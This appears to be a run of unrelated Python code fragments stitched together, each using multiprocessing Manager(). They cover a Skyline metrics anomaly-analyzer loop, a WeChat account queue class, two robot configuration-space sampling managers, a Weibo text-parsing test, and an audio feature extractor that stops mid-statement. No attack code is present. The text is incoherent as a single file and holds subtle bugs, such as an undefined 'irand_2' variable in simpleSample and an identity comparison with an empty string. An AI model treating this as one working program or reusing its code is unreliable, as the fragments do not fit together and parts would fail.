anomalous add it to the :obj:`self.anomalous_metrics` list\n * Add what algorithms triggered to the :obj:`self.anomaly_breakdown_q` queue\n Add keys and values to the queue so the parent process can collate for:\n * :py:obj:`self.anomaly_breakdown_q` * :py:obj:`self.exceptions_q` """ spin_start = time() logger.info('spin_process started') # Discover assigned metrics keys_per_processor = int( ceil( float(len(unique_metrics)) / float(settings.ANALYZER_PROCESSES))) if i == settings.ANALYZER_PROCESSES: assigned_max = len(unique_metrics) else: assigned_max = min(len(unique_metrics), i * keys_per_processor) # Fix analyzer worker metric assignment #94 # https://github.com/etsy/skyline/pull/94 @languitar:worker-fix assigned_min = (i - 1) * keys_per_processor assigned_keys = range(assigned_min, assigned_max) # assigned_keys = range(300, 310) # Compile assigned metrics assigned_metrics = [unique_metrics[index] for index in assigned_keys] # Check if this process is unnecessary if len(assigned_metrics) == 0: return # Multi get series raw_assigned = self.redis_conn.mget(assigned_metrics) # Make process-specific dicts exceptions = defaultdict(int) anomaly_breakdown = defaultdict(int) # Distill timeseries strings into lists for i, metric_name in enumerate(assigned_metrics): self.check_if_parent_is_alive() # logger.info('analysing %s' % metric_name) try: raw_series = raw_assigned[i] unpacker = Unpacker(use_list=False) unpacker.feed(raw_series) timeseries = list(unpacker) anomalous, ensemble, datapoint = run_selected_algorithm( timeseries, metric_name) # If it's anomalous, add it to list if anomalous: base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1) metric = [datapoint, base_name] self.anomalous_metrics.append(metric) # Get the anomaly breakdown - who returned True? triggered_algorithms = [] for index, value in enumerate(ensemble): if value: algorithm = settings.ALGORITHMS[index] anomaly_breakdown[algorithm] += 1 triggered_algorithms.append(algorithm) # It could have been deleted by the Roomba except TypeError: # logger.error('TypeError analysing %s' % metric_name) exceptions['DeletedByRoomba'] += 1 except TooShort: # logger.error('TooShort analysing %s' % metric_name) exceptions['TooShort'] += 1 except Stale: # logger.error('Stale analysing %s' % metric_name) exceptions['Stale'] += 1 except Boring: # logger.error('Boring analysing %s' % metric_name) exceptions['Boring'] += 1 except: # logger.error('Other analysing %s' % metric_name) exceptions['Other'] += 1 logger.info(traceback.format_exc()) # Add values to the queue so the parent process can collate for key, value in anomaly_breakdown.items(): self.anomaly_breakdown_q.put((key, value)) for key, value in exceptions.items(): self.exceptions_q.put((key, value)) spin_end = time() - spin_start logger.info('spin_process took %.2f seconds' % spin_end) def run(self): """ Called when the process intializes. Determine if Redis is up and discover the number of `unique metrics`. Divide the `unique_metrics` between the number of `ANALYZER_PROCESSES` and assign each process a set of metrics to analyse for anomalies. Wait for the processes to finish. Process the Determine whether if any anomalous metrics require:\n * alerting on (and set `EXPIRATION_TIME` key in Redis for alert).\n * feeding to another module e.g. mirage. Populated the webapp json the anomalous_metrics details. Log the details about the run to the skyline log. Send skyline.analyzer metrics to `GRAPHITE_HOST`, """ # Log management to prevent overwriting # Allow the bin/<skyline_app>.d to manage the log if os.path.isfile(skyline_app_logwait): try: os.remove(skyline_app_logwait) except OSError: logger.error('error - failed to remove %s, continuing' % skyline_app_logwait) pass now = time() log_wait_for = now + 5 while now < log_wait_for: if os.path.isfile(skyline_app_loglock): sleep(.1) now = time() else: now = log_wait_for + 1 logger.info('starting %s run' % skyline_app) if os.path.isfile(skyline_app_loglock): logger.error( 'error - bin/%s.d log management seems to have failed, continuing' % skyline_app) try: os.remove(skyline_app_loglock) logger.info('log lock file removed') except OSError: logger.error('error - failed to remove %s, continuing' % skyline_app_loglock) pass else: logger.info('bin/%s.d log management done' % skyline_app) if not os.path.exists(settings.SKYLINE_TMP_DIR): if python_version == 2: os.makedirs(settings.SKYLINE_TMP_DIR, 0750) if python_version == 3: os.makedirs(settings.SKYLINE_TMP_DIR, mode=0o750) # Initiate the algorithm timings if Analyzer is configured to send the # algorithm_breakdown metrics with ENABLE_ALGORITHM_RUN_METRICS algorithm_tmp_file_prefix = settings.SKYLINE_TMP_DIR + '/' + skyline_app + '.' algorithms_to_time = [] if send_algorithm_run_metrics: algorithms_to_time = settings.ALGORITHMS while 1: now = time() # Make sure Redis is up try: self.redis_conn.ping() except: logger.error( 'skyline can\'t connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH) sleep(10) # @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow if settings.REDIS_PASSWORD: self.redis_conn = StrictRedis( password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH) else: self.redis_conn = StrictRedis( unix_socket_path=settings.REDIS_SOCKET_PATH) continue # Report app up self.redis_conn.setex(skyline_app, 120, now) # Discover unique metrics unique_metrics = list( self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics')) if len(unique_metrics) == 0: logger.info( 'no metrics in redis. try adding some - see README') sleep(10) continue # Using count files rather that multiprocessing.Value to enable metrics for # metrics for algorithm run times, etc for algorithm in algorithms_to_time: algorithm_count_file = algorithm_tmp_file_prefix + algorithm + '.count' algorithm_timings_file = algorithm_tmp_file_prefix + algorithm + '.timings' # with open(algorithm_count_file, 'a') as f: with open(algorithm_count_file, 'w') as f: pass with open(algorithm_timings_file, 'w') as f: pass # Spawn processes pids = [] pid_count = 0 for i in range(1, settings.ANALYZER_PROCESSES + 1): if i > len(unique_metrics): logger.info( 'WARNING: skyline is set for more cores than needed.') break p = Process(target=self.spin_process, args=(i, unique_metrics)) pids.append(p) pid_count += 1 logger.info('starting %s of %s spin_process/es' % (str(pid_count), str(settings.ANALYZER_PROCESSES))) p.start() # Send wait signal to zombie processes # for p in pids: # p.join() # Self monitor processes and terminate if any spin_process has run # for longer than 180 seconds p_starts = time() while time() - p_starts <= 180: if any(p.is_alive() for p in pids): # Just to avoid hogging the CPU sleep(.1) else: # All the processes are done, break now. time_to_run = time() - p_starts logger.info( '%s :: %s spin_process/es completed in %.2f seconds' % (skyline_app, str( settings.ANALYZER_PROCESSES), time_to_run)) break else: # We only enter this if we didn't 'break' above. logger.info( '%s :: timed out, killing all spin_process processes' % (skyline_app)) for p in pids: p.terminate() # p.join() # Grab data from the queue and populate dictionaries exceptions = dict() anomaly_breakdown = dict() while 1: try: key, value = self.anomaly_breakdown_q.get_nowait() if key not in anomaly_breakdown.keys(): anomaly_breakdown[key] = value else: anomaly_breakdown[key] += value except Empty: break while 1: try: key, value = self.exceptions_q.get_nowait() if key not in exceptions.keys(): exceptions[key] = value else: exceptions[key] += value except Empty: break # Push to panorama # if len(self.panorama_anomalous_metrics) > 0: # logger.info('to do - push to panorama') # Push to crucible # if len(self.crucible_anomalous_metrics) > 0: # logger.info('to do - push to crucible') # Write anomalous_metrics to static webapp directory # Using count files rather that multiprocessing.Value to enable metrics for # metrics for algorithm run times, etc for algorithm in algorithms_to_time: algorithm_count_file = algorithm_tmp_file_prefix + algorithm + '.count' algorithm_timings_file = algorithm_tmp_file_prefix + algorithm + '.timings' try: algorithm_count_array = [] with open(algorithm_count_file, 'r') as f: for line in f: value_string = line.replace('\n', '') unquoted_value_string = value_string.replace( "'", '') float_value = float(unquoted_value_string) algorithm_count_array.append(float_value) except: algorithm_count_array = False if not algorithm_count_array: continue number_of_times_algorithm_run = len(algorithm_count_array) logger.info('algorithm run count - %s run %s times' % (algorithm, str(number_of_times_algorithm_run))) if number_of_times_algorithm_run == 0: continue try: algorithm_timings_array = [] with open(algorithm_timings_file, 'r') as f: for line in f: value_string = line.replace('\n', '') unquoted_value_string = value_string.replace( "'", '') float_value = float(unquoted_value_string) algorithm_timings_array.append(float_value) except: algorithm_timings_array = False if not algorithm_timings_array: continue number_of_algorithm_timings = len(algorithm_timings_array) logger.info('algorithm timings count - %s has %s timings' % (algorithm, str(number_of_algorithm_timings))) if number_of_algorithm_timings == 0: continue try: _sum_of_algorithm_timings = sum(algorithm_timings_array) except: logger.error("sum error: " + traceback.format_exc()) _sum_of_algorithm_timings = round(0.0, 6) logger.error('error - sum_of_algorithm_timings - %s' % (algorithm)) continue sum_of_algorithm_timings = round(_sum_of_algorithm_timings, 6) # logger.info('sum_of_algorithm_timings - %s - %.16f seconds' % (algorithm, sum_of_algorithm_timings)) try: _median_algorithm_timing = determine_median( algorithm_timings_array) except: _median_algorithm_timing = round(0.0, 6) logger.error('error - _median_algorithm_timing - %s' % (algorithm)) continue median_algorithm_timing = round(_median_algorithm_timing, 6) # logger.info('median_algorithm_timing - %s - %.16f seconds' % (algorithm, median_algorithm_timing)) logger.info( 'algorithm timing - %s - total: %.6f - median: %.6f' % (algorithm, sum_of_algorithm_timings, median_algorithm_timing)) send_mertic_name = 'algorithm_breakdown.' + algorithm + '.timing.times_run' self.send_graphite_metric(send_mertic_name, '%d' % number_of_algorithm_timings) send_mertic_name = 'algorithm_breakdown.' + algorithm + '.timing.total_time' self.send_graphite_metric(send_mertic_name, '%.6f' % sum_of_algorithm_timings) send_mertic_name = 'algorithm_breakdown.' + algorithm + '.timing.median_time' self.send_graphite_metric(send_mertic_name, '%.6f' % median_algorithm_timing) # Log progress logger.info('seconds to run :: %.2f' % (time() - now)) logger.info('total metrics :: %d' % len(unique_metrics)) logger.info('total analyzed :: %d' % (len(unique_metrics) - sum(exceptions.values()))) logger.info('total anomalies :: %d' % len(self.anomalous_metrics)) logger.info('exception stats :: %s' % exceptions) logger.info('anomaly breakdown :: %s' % anomaly_breakdown) # Log to Graphite self.send_graphite_metric('run_time', '%.2f' % (time() - now)) self.send_graphite_metric( 'total_analyzed', '%.2f' % (len(unique_metrics) - sum(exceptions.values()))) self.send_graphite_metric('total_anomalies', '%d' % len(self.anomalous_metrics)) self.send_graphite_metric('total_metrics', '%d' % len(unique_metrics)) for key, value in exceptions.items(): send_metric = 'exceptions.%s' % key self.send_graphite_metric(send_metric, '%d' % value) for key, value in anomaly_breakdown.items(): send_metric = 'anomaly_breakdown.%s' % key self.send_graphite_metric(send_metric, '%d' % value) # Check canary metric raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC) if raw_series is not None: unpacker = Unpacker(use_list=False) unpacker.feed(raw_series) timeseries = list(unpacker) time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600 projected = 24 * (time() - now) / time_human logger.info('canary duration :: %.2f' % time_human) self.send_graphite_metric('duration', '%.2f' % time_human) self.send_graphite_metric('projected', '%.2f' % projected) # Reset counters self.anomalous_metrics[:] = [] # Sleep if it went too fast # if time() - now < 5: # logger.info('sleeping due to low run time...') # sleep(10) # @modified 20160504 - @earthgecko - development internal ref #1338, #1340) # Etsy's original if this was a value of 5 seconds which does # not make skyline Analyzer very efficient in terms of installations # where 100s of 1000s of metrics are being analyzed. This lead to # Analyzer running over several metrics multiple time in a minute # and always working. Therefore this was changed from if you took # less than 5 seconds to run only then sleep. This behaviour # resulted in Analyzer analysing a few 1000 metrics in 9 seconds and # then doing it again and again in a single minute. Therefore the # ANALYZER_OPTIMUM_RUN_DURATION setting was added to allow this to # self optimise in cases where skyline is NOT deployed to analyze # 100s of 1000s of metrics. This relates to optimising performance # for any deployments in the few 1000s and 60 second resolution # area, e.g. smaller and local deployments. process_runtime = time() - now analyzer_optimum_run_duration = settings.ANALYZER_OPTIMUM_RUN_DURATION if process_runtime < analyzer_optimum_run_duration: sleep_for = (analyzer_optimum_run_duration - process_runtime) # sleep_for = 60 logger.info( 'sleeping for %.2f seconds due to low run time...' % sleep_for) sleep(sleep_for)
class Queue_server(object): ''' 初始话公众号队列 @param Tuple wx_lists 公众号列表 ''' def __init__(self ,wx_lists=()): self.__queue = Manager().Queue(-1) self.init_wx_lists(wx_lists) self.__fail_list = Manager().list() ''' 初始话公众号队列 @param Tuple wx_lists 公众号列表 ''' def init_wx_lists(self ,wx_lists=()): for wx in wx_lists: self.put(wx) ''' 添加元素 @param mixed value 要添加的元素 ''' def put(self ,value): self.__queue.put(value) ''' 弹出元素 @return mixed ''' def get(self): if not self.empty(): return self.__queue.get() return False ''' 获取队列 @return mixed ''' def get_wx_lists_queue(self): return self.__queue ''' 获取队列大小 @return int ''' def get_size(self): return self.__queue.qsize() ''' 队列是否为空 @return bool ''' def empty(self): return self.__queue.empty() ''' 添加失败数据 @param tuple wx_data 公众号信息 @return bool ''' def put_fail_wx(self , wx_data): self.__fail_list.append(wx_data) ''' 打印失败列表 ''' def print_fail_list(self ,flush=None): if len(self.__fail_list) > 0 : for fail in self.__fail_list: self.put(fail) print 'the fail wx : {0}' . format(fail) if not flush: self.__fail_list = Manager().list() elif flush: print 'all success' #判断是否有错 def is_have_failed(self): #判断是否有失败的公众号重新加入队列中 return not self.empty()
class SampleManager: def __init__( self, CSpace ): self.mCSpace = CSpace; self.mCollisionMgr = CSpace.mCollisionMgr; self.mDistSamples = Manager().list(); self.mFreeSamples = []; self.mObstSamples = []; self.g_failTimes = Value( 'i', 0 ); def simpleSample(self, num): """randomly sample the world. save all samples""" samp = []; sampCount = 0; for i in range( 0, num ): irand_1 = randrange(0, self.mCSpace.mScaledWidth); irang_2 = randrange(0, self.mCSpace.mScaledHeight); alpha, phi = self.mCSpace.map2UnscaledSpace( irand_1, irand_2 ); if not self.mCollisionMgr.ifCollide( (alpha, phi) ): self.mFreeSamples += [(irand_1, irang_2)]; else: self.mObstSamples += [(irand_1, irang_2)]; pass; def sampleFree(self, num): """Sample free space only, return num samples""" freeSamp = []; freeSampCount = 0; while( freeSampCount < num ): irand_1 = randrange(0, self.mCSpace.mScaledWidth); irang_2 = randrange(0, self.mCSpace.mScaledHeight); alpha, phi = self.mCSpace.map2UnscaledSpace( irand_1, irand_2 ); if not self.mCollisionMgr.ifCollide( (alpha, phi) ): freeSamp += [(irand_1, irang_2)]; freeSampCount += 1; self.mFreeSamples = freeSamp; print "Finished sampling free space, got {0} samples!".format( len(freeSamp) ); return freeSamp; #def sampleNonVisArea( self, num ): # """After sampling many configurations with distance info. # There is still space not covered by those (hyper-)spheres. # This method samples in the non-visiable area, and get num samples""" # if len(self.mDistSamples) == 0: # raise Exception( "Please sample (hyper)spheres in configuration space first." ); # samples = []; # sampCount = 0; # while( sampCount < num ): # irand_1 = randrange(0, self.mCSpace.mScaledWidth); # irang_2 = randrange(0, self.mCSpace.mScaledHeight); # newSamp = ( irand_1, irang_2 ); # newSampValid = True; # for distSamp in self.mDistSamples: # if distSamp.isInside( (newSamp[0], newSamp[1]), self.mCSpace.mScaledWidth, self.mCSpace.mScaledHeight ): # newSampValid = False; # break; # if newSampValid: # samples += [newSamp]; # sampCount += 1; # return samples; def getARandomFreeSample(self, num): """Randomly sample the space and return a free sample (with distance info). The sample is not inside of any other sphere. Also, this method will not automatically add the new sample to self.mDistSamples list. @param num: fail time. If failed to find such a sample num times, return null""" failTime=0; while( failTime < num ): rnd1 = randrange(0,self.mCSpace.mScaledWidth); rnd2 = randrange(0,self.mCSpace.mScaledHeight); alpha, phi = self.mCSpace.map2UnscaledSpace( rnd1, rnd2 ); if( self.mCollisionMgr.ifCollide( (alpha, phi) ) ): continue; newSamp = True; for sample in self.mDistSamples: if sample.isInside( (rnd1, rnd2), self.mCSpace.mScaledWidth, self.mCSpace.mScaledHeight ): newSamp = False; failTime += 1 break; if newSamp: # randomly shoot rays to get the nearest distance to obstacles rayShooter = RayShooter( rnd1, rnd2, self.mCollisionMgr, self.mCSpace ); dist = rayShooter.randShoot(72); if math.fabs(dist) >= 1.0: newDistSamp = DistSample(rnd1, rnd2, dist); #(self.mDistSamples).append( newDistSamp ); print "failed times: {0}".format( failTime ); failTime=0; return newDistSamp; else: failTime += 1; return None; ###======================================================================================= ###=== Strategy 2: Randomly sample one sphere, then sample from the boundary ###=== Then keep sampling the new boundary of the set of spheres def distSampleOneThread( self, num, imgSurface=None ): self.mDistSamples = []; boundaryQueue = Queue(); bndSphDict = defaultdict(); randFreeSamp = 1234; while( randFreeSamp != None ): randFreeSamp = self.getARandomFreeSample( num ); if( randFreeSamp == None ): return; self.mDistSamples.append( randFreeSamp ); self.drawDistSample(imgSurface, (randFreeSamp.mSample[0],randFreeSamp.mSample[1]), randFreeSamp.mRadius); bounds = randFreeSamp.getBoundaryConfigs(self.mCSpace.mScaledWidth, self.mCSpace.mScaledHeight); for bndConfig in bounds: #if not bndConfig in bndSphDict: # put the boundconfig-sphere relation to the dictionary bndSphDict[bndConfig] = randFreeSamp; boundaryQueue.put( bndConfig ); # put the boundary config to the queue. while( not boundaryQueue.empty() ): #print "Size of dist samples {0}".format( len( self.mDistSamples ) ); # if( len(self.mDistSamples) % 100 == 0 ): #randFreeSamp = self.getARandomFreeSample( num ); #if( randFreeSamp == None ): # return; #(self.mDistSamples).append( randFreeSamp ) #bounds = randFreeSamp.getBoundaryConfigs(self.mCSpace.mScaledWidth, self.mCSpace.mScaledHeight); # get the boundary configs #for bndConfig in bounds: # #if not bndConfig in bndSphDict: # put the boundconfig-sphere relation to the dictionary # bndSphDict[bndConfig] = newDistSamp; # boundaryQueue.put( bndConfig ); # put the boundary config to the queue. bnd = boundaryQueue.get(); # get a new boundary newSamp = True; if self.mCollisionMgr.ifCollide((bnd[0], bnd[1])): continue; for sample in self.mDistSamples: if sample.isInside( (bnd[0], bnd[1]), self.mCSpace.mScaledWidth, self.mCSpace.mScaledHeight ): #####################################################################################================================ Locally Sensetive Hash # check if within any spheres, not including the sphere that the boundary config belongs to. newSamp = False; break; if newSamp: # randomly shoot rays to get the nearest distance to obstacles rayShooter = RayShooter( bnd[0], bnd[1], self.mCollisionMgr, self.mCSpace ); # Shot ray dist = rayShooter.randShoot(72); # Get the distance to obstacles if (dist) >= 2.0: # if not too close to obstacles newDistSamp = DistSample(bnd[0], bnd[1], dist) # construct a new dist sample self.mDistSamples.append( newDistSamp ); # add to our dist sample set self.drawDistSample( imgSurface, (newDistSamp.mSample[0], newDistSamp.mSample[1]), newDistSamp.mRadius ); bounds = newDistSamp.getBoundaryConfigs(self.mCSpace.mScaledWidth, self.mCSpace.mScaledHeight); # get the boundary configs #for boundary in boundaryQueue: # if newDistSamp.isInside( (boundary[0],boundary[1]), self.mCSpace.mScaledWidth, self.mCSpace.mScaledHeight ): # pass; for bndConfig in bounds: #if not bndConfig in bndSphDict: # put the boundconfig-sphere relation to the dictionary bndSphDict[bndConfig] = newDistSamp; boundaryQueue.put( bndConfig ); # put the boundary config to the queue. def renderAllDistSamples(self, ImgSurface): """Render distance sample to image""" print "render {0} dist samples to the image".format( len(self.mDistSamples) ); freeColor = ( 0, 0, 250 ); obstColor = ( 200, 0, 100 ); for samp in self.mDistSamples: if samp.mRadius > 0: # Free sample self.drawDistSample( ImgSurface, (int(samp.mSample[0]), int(samp.mSample[1])), int(math.fabs(samp.mRadius)), freeColor ); #pygame.draw.circle( ImgSurface, freeColor, (int(samp.mSample[0]), int(samp.mSample[1])), int(math.fabs(samp.mRadius)), 1 ); else: self.drawDistSample( ImgSurface, (int(samp.mSample[0]), int(samp.mSample[1])), int(math.fabs(samp.mRadius)), obstColor ); #pygame.draw.circle( ImgSurface, obstColor, (int(samp.mSample[0]), int(samp.mSample[1])), int(math.fabs(samp.mRadius)), 1 ); def drawDistSample(self, imgsurf, origin, radius, color=(0,0,250)): if(imgsurf is not None and radius <= 1000000000 and radius > 0): pygame.draw.circle( imgsurf, color,(int(origin[0]),int(origin[1])), int(radius), 1 ); if( origin[0]-radius<0 ): pygame.draw.circle( imgsurf, color,(int(origin[0])+900,int(origin[1])), int(radius), 1 ); if( origin[1]-radius<0 ): pygame.draw.circle( imgsurf, color,(int(origin[0]),int(origin[1])+900), int(radius), 1 ); if( origin[0]+radius>900 ): pygame.draw.circle( imgsurf, color,(int(origin[0])-900,int(origin[1])), int(radius), 1 ); if( origin[1]+radius>900 ): pygame.draw.circle( imgsurf, color,(int(origin[0]),int(origin[1])-900), int(radius), 1 ); for event in pygame.event.get(): pass; pygame.display.update(); def writeSamplesToFile( self, filename ): file2write = open( filename, 'w' ); formattedData = "" for vector in self.mDistSamples: formattedData += "{0}\t{1}\t{2}\n".format( vector.mSample[0], vector.mSample[1], vector.mRadius ) pass file2write.write( formattedData ); file2write.close(); def loadDistSamplesFromFile( self, filename ): file2read = open( filename, 'r' ); self.mDistSamples = []; for line in file2read: strDistSamp = line; info = strDistSamp.split( '\t' ); distSamp = DistSample( float(info[0]), float(info[1]), float(info[2])); if( distSamp.mRadius > 2 ): self.mDistSamples += [ distSamp ];
class SampleManager: def __init__( self, CSpace ): self.mCSpace = CSpace; self.mCollisionMgr = CSpace.mCollisionMgr; self.mDistSamples = Manager().list(); self.mFreeSamples = []; self.mObstSamples = []; self.g_failTimes = Value( 'i', 0 ); unitLens = [100] * len( self.mCSpace.mMaxDimLens ) self.mSpacePartition = SpacePartition( self.mCSpace.mMaxDimLens, unitLens ); def getFreeSamples( self, num, dim, maxDimLens ): """get num number of free samples in C-Space""" size = 0; while size < num: rnd = [0] * dim; for i in range( 0, dim ): rnd[i] = randrange( 0, maxDimLens[i] ); pass #angles = self.mCSpace.map2UnscaledSpace( rnd ); if( not self.mCollisionMgr.ifCollide( rnd ) ): self.mFreeSamples.append( rnd ); size += 1; def randomSample( self, num, dim, maxDimLens ): for i in range( 0, num ): rnd = [0] * dim; for i in range( 0, dim ): rnd[i] = randrange( 0, maxDimLens[i] ); pass #config = self.mCSpace.map2UnscaledSpace( rnd ); if( not self.mCollisionMgr.ifCollide( rnd ) ): self.mFreeSamples.append( rnd ); else: self.mObstSamples.append( rnd ); def getARandomFreeSample(self, num, maxDimLens, dim): """Randomly sample the space and return a free sample (with distance info). The sample is not inside of any other sphere. Also, this method will not automatically add the new sample to self.mDistSamples list. @param num: fail time. If failed to find such a sample num times, return null""" failTime=0; while( failTime < num ): rnd = [0] * dim; for i in range( 0, dim ): rnd[i] = randrange( 0, maxDimLens[i] ); pass #angles = self.mCSpace.map2UnscaledSpace( rnd ); if( self.mCollisionMgr.ifCollide( rnd ) ): continue; newSamp = True; grid = self.mSpacePartition.getContainingGrid( rnd ); for sphere in grid.mContainer: if sphere.isInside( rnd ): newSamp = False; failTime += 1 break; if newSamp: # randomly shoot rays to get the nearest distance to obstacles rayShooter = RayShooter( rnd, self.mCollisionMgr, self.mCSpace ); dist = rayShooter.randShoot(50 * 2); if math.fabs(dist) >= 1.0: newDistSamp = DistSample( rnd, dist ); print "------>\tfailed times: {0}".format( failTime ); failTime=0; return newDistSamp; else: failTime += 1; return None; def distSampleUsingObstSurfSamps( self, num, maxDimLens ): """@param num: failure time to sample a new configuration randomly""" self.randomSample( 100, len(maxDimLens), maxDimLens ); searcher = ObstSurfSearcher(self.mCollisionMgr, self.mCSpace); searcher.searchObstSurfConfigs( self.mFreeSamples, self.mObstSamples, 2 ); self.mDistSamples = []; boundaryQueue = []; bndSphDict = defaultdict(); randFreeSamp = 1234; while( randFreeSamp != None ): randFreeSamp = self.getARandomFreeSample( num, maxDimLens, 2); if( randFreeSamp == None ): return; self.mDistSamples.append( randFreeSamp ); bounds = randFreeSamp.getBoundaryConfigs( maxDimLens ); for bndConfig in bounds: #if not bndConfig in bndSphDict: # put the boundconfig-sphere relation to the dictionary bndSphDict[str(bndConfig)] = randFreeSamp; boundaryQueue.append( bndConfig ); # put the boundary config to the queue. while( len( boundaryQueue) != 0 ): bnd = boundaryQueue[0]; # get a new boundary del boundaryQueue[0] newSamp = True; bndUnscaled = self.mCSpace.map2UnscaledSpace( bnd ); if self.mCollisionMgr.ifCollide( bndUnscaled ): continue; grid = self.mSpacePartition.getContainingGrid( bnd ); for sphere in grid.mContainer: if sphere.isInside( bnd, maxDimLens ): newSamp = False; break; if newSamp: # get the nearest distance to obstacles dist, neighbor = searcher.getNearest( bnd ); # Get the distance to obstacles if (dist) >= 30.0: # if not too close to obstacles newDistSamp = DistSample(bnd, dist) # construct a new dist sample print "{0} R: {1}".format( bnd, dist ); self.mDistSamples.append( newDistSamp ); # add to our dist sample set self.mSpacePartition.addSphere( newDistSamp ); ############# Add new sphere to space partition #if( len(self.mDistSamples) >= 800 ): # return; bounds = newDistSamp.getBoundaryConfigs(maxDimLens); # get the boundary configs for bndConfig in bounds: #if not bndConfig in bndSphDict: # put the boundconfig-sphere relation to the dictionary bndSphDict[str(bndConfig)] = newDistSamp; boundaryQueue.append( bndConfig ); # put the boundary config to the queue. ###########################========================================================= if len(self.mDistSamples)%30 == 0: print "------------ FRESH -------------" idx = 0; for bnd in boundaryQueue: grid = self.mSpacePartition.getContainingGrid( bnd ); for sphere in grid.mContainer: if sphere.isInside( bnd, maxDimLens ): del boundaryQueue[idx]; idx -= 1; idx += 1; # for sphere in self.mDistSamples: # boundaryQueue = [x for x in boundaryQueue if( not sphere.isInside(x, maxDimLens)) ] ###########################========================================================= print "\t\t\t\t\t\t\t\t\t\t{0}\n".format(len(boundaryQueue)); def distSampleOneThread( self, num, maxDimLens ): """@param num: failure time to sample a new configuration randomly""" self.mDistSamples = []; boundaryQueue = []; bndSphDict = defaultdict(); randFreeSamp = 1234; while( randFreeSamp != None ): randFreeSamp = self.getARandomFreeSample( num, maxDimLens, len(maxDimLens) ); if( randFreeSamp == None ): return; self.mDistSamples.append( randFreeSamp ); bounds = randFreeSamp.getBoundaryConfigs( maxDimLens ); for bndConfig in bounds: #if not bndConfig in bndSphDict: # put the boundconfig-sphere relation to the dictionary bndSphDict[str(bndConfig)] = randFreeSamp; boundaryQueue.append( bndConfig ); # put the boundary config to the queue. while( len( boundaryQueue) != 0 ): bnd = boundaryQueue[0]; # get a new boundary del boundaryQueue[0] newSamp = True; if self.mCollisionMgr.ifCollide( bnd ): continue; for sample in self.mDistSamples: if sample.isInside( bnd, maxDimLens ): #####################################################################################================================ Locally Sensetive Hash # check if within any spheres, not including the sphere that the boundary config belongs to. newSamp = False; break; if newSamp: # randomly shoot rays to get the nearest distance to obstacles rayShooter = RayShooter( bnd, self.mCollisionMgr, self.mCSpace ); # Shot ray dim = len(maxDimLens); dist = rayShooter.randShoot(50*(dim-1)); # Get the distance to obstacles if (dist) >= 40.0: # if not too close to obstacles newDistSamp = DistSample(bnd, dist) # construct a new dist sample print "{0} R: {1}".format( bnd, dist ); self.mDistSamples.append( newDistSamp ); # add to our dist sample set bounds = newDistSamp.getBoundaryConfigs(maxDimLens); # get the boundary configs if len(self.mDistSamples) == 100: return; for bndConfig in bounds: #if not bndConfig in bndSphDict: # put the boundconfig-sphere relation to the dictionary bndSphDict[str(bndConfig)] = newDistSamp; boundaryQueue.append( bndConfig ); # put the boundary config to the queue. ###########################========================================================= if len(self.mDistSamples)%100 == 0: print "------------ FRESH -------------" for sphere in self.mDistSamples: boundaryQueue = [x for x in boundaryQueue if( not sphere.isInside(x, maxDimLens)) ] ###########################========================================================= print "\t\t\t\t\t\t\t\t\t{0}\n".format(len(boundaryQueue)); def writeSamplesToFile( self, filename ): file2write = open( filename, 'w' ); formattedData = "" for vector in self.mDistSamples: for i in range( 0, len(vector.mSample) ): formattedData += str( vector.mSample[i] ) + "\t"; formattedData += str(vector.mRadius); formattedData += "\n"; pass file2write.write( formattedData ); file2write.close(); def loadDistSamplesFromFile( self, filename ): file2read = open( filename, 'r' ); self.mDistSamples = []; lineNum = 0; for line in file2read: if( lineNum % 100 == 0 ): print "Reading line: {0}".format( lineNum ); lineNum += 1; strDistSamp = line; info = strDistSamp.split( '\t' ); dim = len(info); pos = [0] * (dim-1); for i in range(0,dim-1): pos[i] = float( info[i] ); radius = float(info[dim-1]); distSamp = DistSample(tuple(pos), radius); if( distSamp.mRadius >= 2 ): self.mDistSamples += [ distSamp ]; self.mSpacePartition.addSphere( distSamp ); def renderDistSamples(self, imgSurf): for samp in self.mDistSamples: samp.render( imgSurf, (0,250,0) );
return t1, t2, t3 t = tt() print t print '博文', t[2] z = zip(t[0], t[1], t[2]) print len(z) for i in range(len(z)): print z[i] from multiprocessing import Process, Manager l = Manager().list() d = {1: 1, 2: 2, 3: 3, 4: 4} l.append(d) print l j = 'id 1749990115 博文id M_DwImDw3ct 博文 【悲催!男子欲滑翔求婚 不想挂树上了[笑cry]】21日,湖北宜昌一男子乘坐滑翔伞在空中向女朋友求婚。但在降落时,因一阵强风被刮到树上,被挂近一小时,最后请来吊车救援。辛苦下树的男子手抱花束,来到女友面前求婚。但女友没有答应转身离去……网友:天公不作美,求婚现场成事故现场[doge](三峡晚报 全文' topic_patternts = re.compile('【.*?】') topic = topic_patternts.findall(j) print topic[0] if len(topic) > 0: topic_clean_pattern = re.compile('(\[.*?])') topic = re.sub(topic_clean_pattern, '', topic[0]) topic_clean2_pattern = re.compile('#(.*?)#') topic = re.sub(topic_clean2_pattern, '', topic) print topic
def extractFeatures(src_dir, base_dir='extracted_features', dataset='us', aug_type='origin', save=False): if base_dir is '': base_dir = path.split(path.abspath(src_dir))[0] n_cores = 20 feat_type = 'logmelspec10000' sr = 44100 win_size = [1024, 4096, 16384] hop_size = 512 n_mels = 128 dir_name = '{}.{}_{}_{}'.format(feat_type, sr, hop_size, n_mels) for ws in win_size: dir_name += '.' + str(int(ws/1024)) # feat_dir = path.join('data/feature', # dir_name, # base_dir) fp_dict = {} fp_list = [] for root, dirs, files in os.walk(src_dir): if files: nof = 0 for in_fn in files: if isAudioFile(in_fn, dataset): in_fp = path.join(root, in_fn) fn, tn = getFileInfo(in_fp, dataset) if fn in fp_dict: fp_dict[fn][-1][tn] = 1 else: target = np.zeros(NUM_TAG, dtype=int) target[tn] = 1 fp_dict[fn] = (in_fp, fn, target) # fp_list.append(in_fp) nof += 1 print('{} files in {}'.format(nof, root)) print('We got totally {} clips.'.format(len(fp_dict.keys()))) num_stat = np.zeros(NUM_TAG, dtype=int) for _p, _n, tags in fp_dict.values(): num_stat[np.sum(tags)-1] += 1 print('Number of clips according to each number of tags:') for i in range(NUM_TAG): print('tags: {}, clips: {}'.format(i, num_stat[i])) all_feat = Manager().list() test_file_list = Manager().list() lock = Lock() func = _func_tag_label for root, dirs, files in 